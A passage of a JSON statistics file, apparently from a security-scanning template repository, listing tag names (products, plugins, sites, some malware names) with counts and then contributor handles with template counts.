":1},{"name":"ampguard","count":1},{"name":"xing","count":1},{"name":"alloannonces","count":1},{"name":"rollupjs","count":1},{"name":"count_per_day_project","count":1},{"name":"mapping_multiple_urls_redirect_same_page_project","count":1},{"name":"3dtoday","count":1},{"name":"eyeem","count":1},{"name":"giters","count":1},{"name":"mastodon-defcon","count":1},{"name":"promodj","count":1},{"name":"gogits","count":1},{"name":"opencast","count":1},{"name":"core-dump","count":1},{"name":"mofi","count":1},{"name":"qualtrics","count":1},{"name":"wiren","count":1},{"name":"magabook","count":1},{"name":"daily_prayer_time_project","count":1},{"name":"bws-xss","count":1},{"name":"pivotal_software","count":1},{"name":"hcpanywhere","count":1},{"name":"instructables","count":1},{"name":"nimplant","count":1},{"name":"popl","count":1},{"name":"graphiql","count":1},{"name":"flyteconsole","count":1},{"name":"stackstorm","count":1},{"name":"careerhabr","count":1},{"name":"biolink","count":1},{"name":"golang","count":1},{"name":"cd-action","count":1},{"name":"coinmarketcap","count":1},{"name":"socat","count":1},{"name":"seber","count":1},{"name":"rainloop","count":1},{"name":"feedwordpress_project","count":1},{"name":"ewm","count":1},{"name":"aspect","count":1},{"name":"scrapingdog","count":1},{"name":"view","count":1},{"name":"archibus","count":1},{"name":"yapishu","count":1},{"name":"external_media_without_import_project","count":1},{"name":"threads","count":1},{"name":"mypixs_project","count":1},{"name":"bws-subscribers","count":1},{"name":"wpa","count":1},{"name":"speaker-deck","count":1},{"name":"cvsweb","count":1},{"name":"huatian","count":1},{"name":"spamtitan","count":1},{"name":"opensso","count":1},{"name":"caton","count":1},{"name":"moonpay","count":1},{"name":"csod","count":1},{"name":"maestro","count":1},{"name":"coinlayer","count":1},{"name":"dissenter","count":1},{"name":"kramer","count":1},{"name":"lua","count":1},{"name":"basicrat","count":1},{"name":"secure-copy-content-protection","count":1},{"name":"chromecast","count":1},{"name":"bold-themes","count":1},{"name":"mod-jk","count":1},{"name":"openview","count":1},{"name":"hcommonssocial-mastodon-instance","count":1},{"name":"sprintful","count":1},{"name":"alumni","count":1},{"name":"storycorps","count":1},{"name":"timely","count":1},{"name":"nc2","count":1},{"name":"google_adsense_project","count":1},{"name":"officekeeper","count":1},{"name":"wpaffiliatemanager","count":1},{"name":"pihole","count":1},{"name":"esafenet","count":1},{"name":"finance","count":1},{"name":"rsyncd","count":1},{"name":"jspxcms","count":1},{"name":"boot","count":1},{"name":"akniga","count":1},{"name":"wpdownloadmanager","count":1},{"name":"dxplanning","count":1},{"name":"wp-guppy","count":1},{"name":"gorest","count":1},{"name":"advance-custom-field","count":1},{"name":"rest","count":1},{"name":"janguo","count":1},{"name":"codeastrology","count":1},{"name":"sinema","count":1},{"name":"flir-ax8","count":1},{"name":"airline-pilot-life","count":1},{"name":"flipboard","count":1},{"name":"piratebay","count":1},{"name":"mspcontrol","count":1},{"name":"tarantella","count":1},{"name":"loganalyzer","count":1},{"name":"peoplesoft","count":1},{"name":"tencent","count":1},{"name":"zm-gallery_project","count":1},{"name":"sphinx","count":1},{"name":"registry","count":1},{"name":"ansi_up_project","count":1},{"name":"inetutils","count":1},{"name":"helpdesk","count":1},{"name":"mailmap","count":1},{"name":"vmstio-mastodon-instance","count":1},{"name":"kaes","count":1},{"name":"laurent_destailleur","count":1},{"name":"slims","count":1},{"name":"vimeo","count":1},{"name":"tor","count":1},{"name":"sensei-lms","count":1},{"name":"vlc-media","count":1},{"name":"aspnuke","count":1},{"name":"cdi","count":1},{"name":"eaa","count":1},{"name":"stestr","count":1},{"name":"vampr","count":1},{"name":"ultimate-weather_project","count":1},{"name":"totalwar","count":1},{"name":"holidayapi","count":1},{"name":"apim","count":1},{"name":"cookieinformation","count":1},{"name":"contactform","count":1},{"name":"sandhillsdev","count":1},{"name":"posthog","count":1},{"name":"mastonyc-mastodon-instance","count":1},{"name":"podcastgenerator","count":1},{"name":"novius-os","count":1},{"name":"three","count":1},{"name":"ait-csv","count":1},{"name":"mastodonchasedemdev-mastodon-instance","count":1},{"name":"librespeed","count":1},{"name":"pikabu","count":1},{"name":"moleculer","count":1},{"name":"php_curl_class_project","count":1},{"name":"mozilla","count":1},{"name":"floc","count":1},{"name":"note","count":1},{"name":"alltube","count":1},{"name":"dwsync","count":1},{"name":"ruijienetworks","count":1},{"name":"verizon","count":1},{"name":"ebird","count":1},{"name":"fractalia","count":1},{"name":"sofneta","count":1},{"name":"diablo","count":1},{"name":"lomnido","count":1},{"name":"kemai","count":1},{"name":"treeview","count":1},{"name":"projectdiscovery","count":1},{"name":"teamtreehouse","count":1},{"name":"extractor","count":1},{"name":"orchardproject","count":1},{"name":"rackup","count":1},{"name":"colourlovers","count":1},{"name":"amp","count":1},{"name":"slickremix","count":1},{"name":"fedora","count":1},{"name":"groomify","count":1},{"name":"persis","count":1},{"name":"coremail","count":1},{"name":"tvt","count":1},{"name":"liquibase","count":1},{"name":"trip","count":1},{"name":"bludit","count":1},{"name":"scoreme_project","count":1},{"name":"webftp","count":1},{"name":"ticketmaster","count":1},{"name":"masselink","count":1},{"name":"bitquery","count":1},{"name":"syncthru","count":1},{"name":"fusion","count":1},{"name":"nas","count":1},{"name":"photoxhibit_project","count":1},{"name":"getresponse","count":1},{"name":"reportico","count":1},{"name":"friendfinder","count":1},{"name":"masacms","count":1},{"name":"atutor","count":1},{"name":"instagram-php-api_project","count":1},{"name":"siebel","count":1},{"name":"packetstrom","count":1},{"name":"airnotifier","count":1},{"name":"hmc","count":1},{"name":"antsword","count":1},{"name":"url-analyse","count":1},{"name":"edgemax","count":1},{"name":"exolis","count":1},{"name":"reblogme","count":1},{"name":"sgi","count":1},{"name":"visualshortcodes","count":1},{"name":"clink-office","count":1},{"name":"smartzone","count":1},{"name":"spirit-project","count":1},{"name":"land-software","count":1},{"name":"paramountplus","count":1},{"name":"zoom","count":1},{"name":"wp-paytm-pay","count":1},{"name":"fedoraproject","count":1},{"name":"jvm","count":1},{"name":"caldotcom","count":1},{"name":"fe","count":1},{"name":"coverity","count":1},{"name":"hydracrypt","count":1},{"name":"artists-clients","count":1},{"name":"pixelfedsocial","count":1},{"name":"gloo","count":1},{"name":"torsocks","count":1},{"name":"bqe","count":1},{"name":"elasticbeanstalk","count":1},{"name":"mapstodonspace-mastodon-instance","count":1},{"name":"opentouch","count":1},{"name":"tunefind","count":1},{"name":"bws-adminpage","count":1},{"name":"konghq","count":1},{"name":"wielebenwir","count":1},{"name":"intigriti","count":1},{"name":"-","count":1},{"name":"my_calendar_project","count":1},{"name":"akeeba","count":1},{"name":"castingcallclub","count":1},{"name":"youpic","count":1},{"name":"thorsten_riess","count":1},{"name":"openx","count":1},{"name":"acf","count":1},{"name":"mastown-mastodon-instance","count":1},{"name":"rsshub","count":1},{"name":"icc-pro","count":1},{"name":"headers","count":1},{"name":"dionesoft","count":1},{"name":"fatcatapps","count":1},{"name":"zero-spam","count":1},{"name":"appserv_open_project","count":1},{"name":"alik","count":1},{"name":"wimkin-publicprofile","count":1},{"name":"gilacms","count":1},{"name":"kaspersky","count":1},{"name":"proofpoint","count":1},{"name":"lancom","count":1},{"name":"monitorr","count":1},{"name":"openwire","count":1},{"name":"routeros","count":1},{"name":"satis","count":1},{"name":"firefox","count":1},{"name":"opensmtpd","count":1},{"name":"clearfy-cache","count":1},{"name":"cloudfront","count":1},{"name":"jasperreport","count":1},{"name":"ftp-backdoor","count":1},{"name":"dplus","count":1},{"name":"gmail","count":1},{"name":"hostuxsocial-mastodon-instance","count":1},{"name":"secui","count":1},{"name":"realgimm","count":1},{"name":"joelrowley","count":1},{"name":"kanich","count":1},{"name":"wordcloud","count":1},{"name":"magix","count":1},{"name":"smartsheet","count":1},{"name":"hiberworld","count":1},{"name":"secudos","count":1},{"name":"bws-adpush","count":1},{"name":"aflam","count":1},{"name":"gimp","count":1},{"name":"kik","count":1},{"name":"satellite","count":1},{"name":"naver","count":1},{"name":"dbt","count":1},{"name":"revive-sas","count":1},{"name":"hongjing","count":1},{"name":"flowcode","count":1},{"name":"rhymix","count":1},{"name":"selfcheck","count":1},{"name":"dynamic","count":1},{"name":"intellislot","count":1},{"name":"huggingface","count":1},{"name":"moin","count":1},{"name":"autonomy","count":1},{"name":"shopxo","count":1},{"name":"shibboleth","count":1},{"name":"masteriyo","count":1},{"name":"dukapress","count":1},{"name":"workerman","count":1},{"name":"elevation","count":1},{"name":"choom","count":1},{"name":"sqlite3","count":1},{"name":"lanproxy","count":1},{"name":"void","count":1},{"name":"lorsh-mastodon-instance","count":1},{"name":"counteract","count":1},{"name":"limit_login_attempts_project","count":1},{"name":"kubeconfig","count":1},{"name":"notolytix","count":1},{"name":"dasan","count":1},{"name":"designmodo","count":1},{"name":"polywork","count":1},{"name":"jejapl","count":1},{"name":"extension","count":1},{"name":"homeautomation","count":1},{"name":"event_management_system_project","count":1},{"name":"foursquare","count":1},{"name":"teradek","count":1},{"name":"bdsmsingles","count":1},{"name":"aa-exec","count":1},{"name":"e2pdf","count":1},{"name":"helmet-store-showroom","count":1},{"name":"vagrant","count":1},{"name":"cytoid","count":1},{"name":"pexip","count":1},{"name":"jupyterhub","count":1},{"name":"tablesome","count":1},{"name":"opensearch","count":1},{"name":"director","count":1},{"name":"h2c","count":1},{"name":"websvn","count":1},{"name":"deimosc2","count":1},{"name":"fiverr","count":1},{"name":"manage","count":1},{"name":"xdg-user-dir","count":1},{"name":"wpsecurityauditlog","count":1},{"name":"oauth2","count":1},{"name":"iceflow","count":1},{"name":"formalms","count":1},{"name":"ciprianmp","count":1},{"name":"ecom","count":1},{"name":"issuu","count":1},{"name":"teespring","count":1},{"name":"teknik","count":1},{"name":"niagara","count":1},{"name":"fuxa","count":1},{"name":"pulsar360","count":1},{"name":"vklworld-mastodon-instance","count":1},{"name":"mstore-api","count":1},{"name":"mailman","count":1},{"name":"piwik","count":1},{"name":"barco","count":1},{"name":"wanelo","count":1},{"name":"ozeki","count":1},{"name":"rainbowfishsoftware","count":1},{"name":"media","count":1},{"name":"projector","count":1},{"name":"prestashop-module","count":1},{"name":"supershell","count":1},{"name":"c-lodop","count":1},{"name":"dasannetworks","count":1},{"name":"dgtl","count":1},{"name":"domaincheckplugin","count":1},{"name":"duckdev","count":1},{"name":"codesnippets","count":1},{"name":"cdist","count":1},{"name":"ovpn","count":1},{"name":"netgenie","count":1},{"name":"aaha-chat","count":1},{"name":"helprace","count":1},{"name":"bedita","count":1},{"name":"properfraction","count":1},{"name":"robomongo","count":1},{"name":"lucy","count":1},{"name":"anyproxy","count":1},{"name":"skaut-bazar_project","count":1},{"name":"camptocamp","count":1},{"name":"twitter-archived-tweets","count":1},{"name":"webviewer","count":1},{"name":"gab","count":1},{"name":"xibocms","count":1},{"name":"insanejournal","count":1},{"name":"vnc","count":1},{"name":"properties","count":1},{"name":"ccm","count":1},{"name":"master-elements","count":1},{"name":"gryphonconnect","count":1},{"name":"pprof","count":1},{"name":"geocaching","count":1},{"name":"rmc","count":1},{"name":"ajax-random-post_project","count":1},{"name":"autoset","count":1},{"name":"pretty-url","count":1},{"name":"badarg","count":1},{"name":"caa","count":1},{"name":"grupposcai","count":1},{"name":"intelliantech","count":1},{"name":"db_backup_project","count":1},{"name":"pauple","count":1},{"name":"nerdgraph","count":1},{"name":"uiuxdevsocial-mastodon-instance","count":1},{"name":"msmswitch","count":1},{"name":"sni","count":1},{"name":"mastodonbooksnet-mastodon-instance","count":1},{"name":"ubigeo_de_peru_para_woocommerce_project","count":1},{"name":"elmah","count":1},{"name":"addpac","count":1},{"name":"pnpm","count":1},{"name":"cal","count":1},{"name":"maxsite","count":1},{"name":"wpsymposiumpro","count":1},{"name":"calendarix","count":1},{"name":"readthedocs","count":1},{"name":"pcoweb","count":1},{"name":"cobub","count":1},{"name":"path","count":1},{"name":"inglorion","count":1},{"name":"panda","count":1},{"name":"nozomi","count":1},{"name":"syntactics","count":1},{"name":"iqonic","count":1},{"name":"hiring","count":1},{"name":"phpbb","count":1},{"name":"malwarebytes","count":1},{"name":"cookex","count":1},{"name":"cargocollective","count":1},{"name":"tjws","count":1},{"name":"auru","count":1},{"name":"erlang","count":1},{"name":"ticket-master","count":1},{"name":"dockerhub","count":1},{"name":"internet-archive-user-search","count":1},{"name":"refsheet","count":1},{"name":"xray","count":1},{"name":"nirweb-support","count":1},{"name":"smtp2go","count":1},{"name":"fastpanel","count":1},{"name":"iparapheur","count":1},{"name":"ektron","count":1},{"name":"microsoft-technet-community","count":1},{"name":"trilium_project","count":1},{"name":"wpruby","count":1},{"name":"placeos","count":1},{"name":"bookstack","count":1},{"name":"oxid","count":1},{"name":"bittube","count":1},{"name":"access","count":1},{"name":"jgraph","count":1},{"name":"gerapy","count":1},{"name":"microcomputers","count":1},{"name":"smartgateway","count":1},{"name":"books","count":1},{"name":"crm","count":1},{"name":"phpgedview","count":1},{"name":"diigo","count":1},{"name":"mongoshake","count":1},{"name":"mobiproxy","count":1},{"name":"fcv","count":1},{"name":"interpals","count":1},{"name":"supremainc","count":1},{"name":"edx","count":1},{"name":"couchcms","count":1},{"name":"engadget","count":1},{"name":"gridx_project","count":1},{"name":"redwood","count":1},{"name":"kaggle","count":1},{"name":"velotismart_project","count":1},{"name":"chronos","count":1},{"name":"sofurry","count":1},{"name":"wannacry","count":1},{"name":"video","count":1},{"name":"mastodon-101010pl","count":1},{"name":"walmart","count":1},{"name":"element","count":1},{"name":"hirak","count":1},{"name":"getmonero","count":1},{"name":"gogoritas","count":1},{"name":"patsatech","count":1},{"name":"serverstatus","count":1},{"name":"sentinelone","count":1},{"name":"wagtail","count":1},{"name":"albicla","count":1},{"name":"gunicorn","count":1},{"name":"wp_content_source_control_project","count":1},{"name":"searchblox","count":1},{"name":"kubeflow","count":1},{"name":"kodexplorer","count":1},{"name":"routers","count":1},{"name":"allesovercrypto","count":1},{"name":"delta","count":1},{"name":"eleanor-cms","count":1},{"name":"node-srv_project","count":1},{"name":"piano","count":1},{"name":"system","count":1},{"name":"evilginx","count":1},{"name":"championat","count":1},{"name":"autocomplete","count":1},{"name":"pdi","count":1},{"name":"patriots-win","count":1},{"name":"basic","count":1},{"name":"kirona","count":1},{"name":"wpb-show-core","count":1},{"name":"tieline","count":1},{"name":"jsconfig","count":1},{"name":"restler","count":1},{"name":"filmweb","count":1},{"name":"signet","count":1},{"name":"secure-donation","count":1},{"name":"xvideos-models","count":1},{"name":"gohigheris","count":1},{"name":"webgrind","count":1},{"name":"darudar","count":1},{"name":"vivotex","count":1},{"name":"drill","count":1},{"name":"wpserveur","count":1},{"name":"alb","count":1},{"name":"vistaweb","count":1},{"name":"quitterpl","count":1},{"name":"etherscan","count":1},{"name":"flahscookie","count":1},{"name":"qsan","count":1},{"name":"qmail","count":1},{"name":"ifeelweb","count":1},{"name":"boa","count":1},{"name":"bws-updater","count":1},{"name":"qibocms","count":1},{"name":"chaos","count":1},{"name":"imgsrcru","count":1},{"name":"eurotel","count":1},{"name":"phpipam","count":1},{"name":"malwarebazaar","count":1},{"name":"pagerduty","count":1},{"name":"gameconnect","count":1},{"name":"visualtools","count":1},{"name":"gozi","count":1},{"name":"sitemap_project","count":1},{"name":"msmtp","count":1},{"name":"nbr","count":1},{"name":"hc_custom_wp-admin_url_project","count":1},{"name":"watcher","count":1},{"name":"clusterdafrica","count":1},{"name":"recly","count":1},{"name":"svnserve","count":1},{"name":"librephotos","count":1},{"name":"adultism","count":1},{"name":"librarything","count":1},{"name":"my-instants","count":1},{"name":"college_management_system_project","count":1},{"name":"memrise","count":1},{"name":"widget","count":1},{"name":"kfm_project","count":1},{"name":"datahub","count":1},{"name":"ismygirl","count":1},{"name":"hoteldrui","count":1},{"name":"sv3c","count":1},{"name":"thegatewaypundit","count":1},{"name":"comodo","count":1},{"name":"biggerpockets","count":1},{"name":"powerware","count":1},{"name":"davidlingren","count":1},{"name":"contentkeeper","count":1},{"name":"ms","count":1},{"name":"room-alert","count":1},{"name":"editor","count":1},{"name":"blender","count":1},{"name":"litmindclub-mastodon-instance","count":1},{"name":"workreap","count":1},{"name":"jnoj","count":1},{"name":"dirk_bartley","count":1},{"name":"kms","count":1},{"name":"impala","count":1},{"name":"smartypantsplugins","count":1},{"name":"faspex","count":1},{"name":"webtransferclient","count":1},{"name":"updraftplus","count":1},{"name":"js-analyse","count":1},{"name":"lanproxy_project","count":1},{"name":"okru","count":1},{"name":"smokeping","count":1},{"name":"aliexpress","count":1},{"name":"lastpass","count":1},{"name":"templateinvaders","count":1},{"name":"codoforumrce","count":1},{"name":"johnniejodelljr","count":1},{"name":"codemiq","count":1},{"name":"telosalliance","count":1},{"name":"jsfiddle","count":1},{"name":"pornhub-users","count":1},{"name":"steemit","count":1},{"name":"chefio","count":1},{"name":"presstigers","count":1},{"name":"supersign","count":1},{"name":"adWidget","count":1},{"name":"acemanager","count":1},{"name":"eg","count":1},{"name":"rpcbind","count":1},{"name":"currencylayer","count":1},{"name":"datezone","count":1},{"name":"obsidian","count":1},{"name":"motioneye_project","count":1},{"name":"maxum","count":1},{"name":"joomla-research","count":1},{"name":"simple-image-manipulator_project","count":1},{"name":"truth-social","count":1},{"name":"bolt","count":1},{"name":"disqus","count":1},{"name":"mining","count":1},{"name":"freesound","count":1},{"name":"tradingview","count":1},{"name":"eyoucms","count":1},{"name":"disabledrocks-mastodon-instance","count":1},{"name":"contempothemes","count":1},{"name":"readtomyshoe","count":1},{"name":"lychee","count":1},{"name":"moneysavingexpert","count":1},{"name":"ctflearn","count":1},{"name":"googlemaps","count":1},{"name":"zapier","count":1},{"name":"analytify","count":1}],"authors":[{"name":"dhiyaneshdk","count":1189},{"name":"daffainfo","count":864},{"name":"dwisiswant0","count":802},{"name":"pikpikcu","count":353},{"name":"pussycat0x","count":313},{"name":"ritikchaddha","count":308},{"name":"pdteam","count":285},{"name":"ricardomaia","count":231},{"name":"geeknik","count":227},{"name":"theamanrawat","count":221},{"name":"r3y3r53","count":200},{"name":"0x_akoko","count":179},{"name":"princechaddha","count":165},{"name":"gy741","count":158},{"name":"rxerium","count":135},{"name":"sleepingbag945","count":132},{"name":"arafatansari","count":119},{"name":"tess","count":109},{"name":"righettod","count":99},{"name":"pdresearch","count":71},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":63},{"name":"iamnoooob","count":59},{"name":"akincibor","count":59},{"name":"for3stco1d","count":55},{"name":"rootxharsh","count":52},{"name":"philippedelteil","count":48},{"name":"gaurang","count":42},{"name":"edoardottt","count":41},{"name":"johnk3r","count":39},{"name":"c-sh0","count":35},{"name":"j4vaovo","count":34},{"name":"adam crosser","count":31},{"name":"luisfelipe146","count":31},{"name":"ice3man","count":28},{"name":"pwnhxl","count":25},{"name":"organiccrap","count":24},{"name":"hardik-solanki","count":24},{"name":"techbrunchfr","count":23},{"name":"ctflearner","count":23},{"name":"harsh","count":23},{"name":"ffffffff0x","count":22},{"name":"mastercho","count":22},{"name":"cckuailong","count":18},{"name":"sullo","count":18},{"name":"parthmalhotra","count":18},{"name":"shaikhyaser","count":16},{"name":"lu4nx","count":16},{"name":"random-robbie","count":16},{"name":"0xpugazh","count":16},{"name":"sheikhrishad","count":15},{"name":"unapibageek","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"r3dg33k","count":14},{"name":"dogasantos","count":14},{"name":"tenbird","count":14},{"name":"0ri2n","count":13},{"name":"elsfa7110","count":13},{"name":"theabhinavgaur","count":13},{"name":"melbadry9","count":13},{"name":"sharath","count":13},{"name":"bhutch","count":13},{"name":"nullfuzz","count":13},{"name":"suman_kar","count":12},{"name":"meme-lord","count":12},{"name":"cyllective","count":11},{"name":"wdahlenb","count":11},{"name":"kazet","count":11},{"name":"logicalhunter","count":10},{"name":"co5mos","count":10},{"name":"hackergautam","count":10},{"name":"random_robbie","count":10},{"name":"alph4byt3","count":10},{"name":"0x240x23elu","count":10},{"name":"nadino","count":10},{"name":"olearycrew","count":9},{"name":"oppsec","count":9},{"name":"fabaff","count":9},{"name":"initstring","count":9},{"name":"momika233","count":9},{"name":"adamcrosser","count":9},{"name":"emadshanab","count":9},{"name":"noraj","count":8},{"name":"iamthefrogy","count":8},{"name":"zh","count":8},{"name":"irshad ahamed","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"veshraj","count":8},{"name":"_0xf4n9x_","count":8},{"name":"randomstr1ng","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"its0x08","count":7},{"name":"caspergn","count":7},{"name":"dr_set","count":7},{"name":"huta0","count":7},{"name":"me_dheeraj (https://twitter.com/dheerajmadhukar)","count":7},{"name":"nodauf","count":7},{"name":"leovalcante","count":7},{"name":"divya_mudgal","count":7},{"name":"amit-jd","count":7},{"name":"harshbothra_","count":7},{"name":"tarunkoyalwar","count":7},{"name":"devang-solanki","count":6},{"name":"evan rubinstein","count":6},{"name":"imnightmaree","count":6},{"name":"puzzlepeaches","count":6},{"name":"ja1sh","count":6},{"name":"forgedhallpass","count":6},{"name":"megamansec","count":6},{"name":"pathtaga","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"gitlab red team","count":6},{"name":"__fazal","count":6},{"name":"justaacat","count":6},{"name":"xelkomy","count":6},{"name":"byt3bl33d3r","count":6},{"name":"clem9669","count":6},{"name":"pentest_swissky","count":6},{"name":"r3naissance","count":5},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"arm!tage","count":5},{"name":"robotshell","count":5},{"name":"panch0r3d","count":5},{"name":"prajiteshsingh","count":5},{"name":"kh4sh3i","count":5},{"name":"andreluna","count":5},{"name":"podalirius","count":5},{"name":"r12w4n","count":5},{"name":"your3cho","count":5},{"name":"defr0ggy","count":5},{"name":"powerexploit","count":5},{"name":"gtrrnr","count":5},{"name":"shine","count":5},{"name":"vicrack","count":5},{"name":"yanyun","count":5},{"name":"s0obi","count":5},{"name":"mr-xn","count":5},{"name":"0xr2r","count":4},{"name":"scent2d","count":4},{"name":"jpg0mez","count":4},{"name":"dadevel","count":4},{"name":"xxcdd","count":4},{"name":"incogbyte","count":4},{"name":"heeress","count":4},{"name":"nybble04","count":4},{"name":"dolev farhi","count":4},{"name":"shankar acharya","count":4},{"name":"cookiehanhoan","count":4},{"name":"e_schultze_","count":4},{"name":"ggranjus","count":4},{"name":"lum8rjack","count":4},{"name":"wisnupramoedya","count":4},{"name":"tanq16","count":4},{"name":"ice3man543","count":4},{"name":"king-alexander","count":4},{"name":"h1ei1","count":4},{"name":"hahwul","count":4},{"name":"k0pak4","count":4},{"name":"3th1c_yuk1","count":4},{"name":"lucasljm2001","count":3},{"name":"dudez","count":3},{"name":"binaryfigments","count":3},{"name":"andydoering","count":3},{"name":"badboycxcc","count":3},{"name":"cheesymoon","count":3},{"name":"ph33r","count":3},{"name":"aringo","count":3},{"name":"alifathi-h1","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"swissky","count":3},{"name":"parth","count":3},{"name":"bernardofsr","count":3},{"name":"whoever","count":3},{"name":"iamnooob","count":3},{"name":"lucky0x0d","count":3},{"name":"z3bd","count":3},{"name":"vagnerd","count":3},{"name":"me9187","count":3},{"name":"splint3r7","count":3},{"name":"lark-lab","count":3},{"name":"thomas_from_offensity","count":3},{"name":"johnjhacking","count":3},{"name":"evergreencartoons","count":3},{"name":"flx","count":3},{"name":"canberbamber","count":3},{"name":"emenalf","count":3},{"name":"fxploit","count":3},{"name":"atomiczsec","count":3},{"name":"vsh00t","count":3},{"name":"shifacyclewala","count":3},{"name":"m4lwhere","count":3},{"name":"arcc","count":3},{"name":"skeltavik","count":3},{"name":"imjust0","count":3},{"name":"matt galligan","count":3},{"name":"davidmckennirey","count":3},{"name":"ekrause","count":3},{"name":"taielab","count":3},{"name":"xianke","count":3},{"name":"sushantkamble","count":3},{"name":"jarijaas","count":3},{"name":"unstabl3","count":3},{"name":"mavericknerd","count":3},{"name":"_generic_human_","count":3},{"name":"isacaya","count":3},{"name":"farish","count":3},{"name":"randomrobbie","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"0w4ys","count":3},{"name":"f1tz","count":3},{"name":"impramodsargar","count":3},{"name":"ambassify","count":3},{"name":"fyoorer","count":3},{"name":"e1a","count":3},{"name":"true13","count":3},{"name":"dr0pd34d","count":3},{"name":"j3ssie","count":3},{"name":"coldfish","count":3},{"name":"huowuzhao","count":3},{"name":"github.com/its0x08","count":2},{"name":"0xsmiley","count":2},{"name":"raesene","count":2},{"name":"danielmofer","count":2},{"name":"udit_thakkur","count":2},{"name":"codexlynx","count":2},{"name":"wa1tf0rme","count":2},{"name":"geekby","count":2},{"name":"redteambrasil","count":2},{"name":"ayadim","count":2},{"name":"davidegirardi","count":2},{"name":"k11h-de","count":2},{"name":"bsysop","count":2},{"name":"mzack9999","count":2},{"name":"thevillagehacker","count":2},{"name":"0xrudra","count":2},{"name":"moritz nentwig","count":2},{"name":"mohammedsaneem","count":2},{"name":"vavkamil","count":2},{"name":"zy9ard3","count":2},{"name":"dogancanbakir","count":2},{"name":"kiblyn11","count":2},{"name":"martincodes-de","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"0xcrypto","count":2},{"name":"x1m_martijn","count":2},{"name":"y4er","count":2},{"name":"mrharshvardhan","count":2},{"name":"dbrwsky","count":2},{"name":"0xsapra","count":2},{"name":"brucelsone","count":2},{"name":"rafaelwdornelas","count":2},{"name":"bing0o","count":2},{"name":"msegoviag","count":2},{"name":"usdag","count":2},{"name":"v0idc0de","count":2},{"name":"kre80r","count":2},{"name":"notnotnotveg","count":2},{"name":"afaq","count":2},{"name":"dahse89","count":2},{"name":"sinkettu","count":2},{"name":"shelled","count":2},{"name":"herry","count":2},{"name":"convisoappsec","count":2},{"name":"parzival","count":2},{"name":"cckuakilong","count":2},{"name":"g4l1t0","count":2},{"name":"shankaracharya","count":2},{"name":"6mile","count":2},{"name":"z0ne","count":2},{"name":"streetofhackerr007","count":2},{"name":"florianmaak","count":2},{"name":"christianpoeschl","count":2},{"name":"dheerajmadhukar","count":2},{"name":"pxmme1337","count":2},{"name":"luci","count":2},{"name":"paperpen","count":2},{"name":"bmcel","count":2},{"name":"arliya","count":2},{"name":"666asd","count":2},{"name":"paradessia","count":2},{"name":"bananabr","count":2},{"name":"gevakun","count":2},{"name":"koti2","count":2},{"name":"randomdhiraj","count":2},{"name":"socketz","count":2},{"name":"kishore-hariram","count":2},{"name":"manas_harsh","count":2},{"name":"gal nagli","count":2},{"name":"danmcinerney","count":2},{"name":"ree4pwn","count":2},{"name":"n-thumann","count":2},{"name":"brenocss","count":2},{"name":"joshlarsen","count":2},{"name":"ep1csage","count":2},{"name":"supras","count":2},{"name":"ehsahil","count":2},{"name":"ajaysenr","count":2},{"name":"nkxxkn","count":2},{"name":"nvn1729","count":2},{"name":"cocxanh","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"joeldeleep","count":2},{"name":"liwermor","count":2},{"name":"0xelkomy","count":2},{"name":"8arthur","count":2},{"name":"sascha brendel","count":2},{"name":"maximus decimus","count":2},{"name":"korteke","count":2},{"name":"salts","count":2},{"name":"0xnirvana","count":2},{"name":"supr4s","count":2},{"name":"uomogrande","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"zomsop82","count":2},{"name":"thabisocn","count":2},{"name":"myztique","count":2},{"name":"amsda","count":2},{"name":"bp0lr","count":2},{"name":"joshua rogers","count":2},{"name":"c3l3si4n","count":2},{"name":"nuk3s3c","count":2},{"name":"foulenzer","count":2},{"name":"hackerarpan","count":2},{"name":"sy3omda","count":2},{"name":"sbani","count":2},{"name":"thardt-praetorian","count":2},{"name":"h0j3n","count":2},{"name":"d4vy","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"thezakman","count":2},{"name":"hetroublemakr","count":2},{"name":"clarkvoss","count":2},{"name":"lotusdll","count":2},{"name":"w4cky_","count":2},{"name":"spac3wh1te","count":1},{"name":"kiransau","count":1},{"name":"opencirt","count":1},{"name":"viniciuspereiras","count":1},{"name":"yiran","count":1},{"name":"nytr0gen","count":1},{"name":"therealtoastycat","count":1},{"name":"soyelmago","count":1},{"name":"evan rubinstien","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"micha3lb3n","count":1},{"name":"numan türle","count":1},{"name":"sickwell","count":1},{"name":"retr0","count":1},{"name":"adnanekhan","count":1},{"name":"iphantasmic","count":1},{"name":"chesterblue","count":1},{"name":"exid","count":1},{"name":"shockwave","count":1},{"name":"marcos_iaf","count":1},{"name":"topscoder","count":1},{"name":"shivanshkhari","count":1},{"name":"millermedia","count":1},{"name":"brabbit10","count":1},{"name":"abbas.heybati","count":1},{"name":"geraldino2","count":1},{"name":"furkansayim","count":1},{"name":"natto97","count":1},{"name":"furkansenan","count":1},{"name":"hazana","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"gpiechnik2","count":1},{"name":"oscarintherocks","count":1},{"name":"notwhy","count":1},{"name":"retr02332","count":1},{"name":"lrtk-coder","count":1},{"name":"th3r4id","count":1},{"name":"hczdmr","count":1},{"name":"matt miller","count":1},{"name":"ransomsec","count":1},{"name":"sospiro","count":1},{"name":"ringo","count":1},{"name":"p-l-","count":1},{"name":"bad5ect0r","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"chron0x","count":1},{"name":"lingtren","count":1},{"name":"bughuntersurya","count":1},{"name":"act1on3","count":1},{"name":"shelld3v","count":1},{"name":"jub0bs","count":1},{"name":"aravind","count":1},{"name":"affix","count":1},{"name":"ahmetpergamum","count":1},{"name":"aayush vishnoi","count":1},{"name":"lark 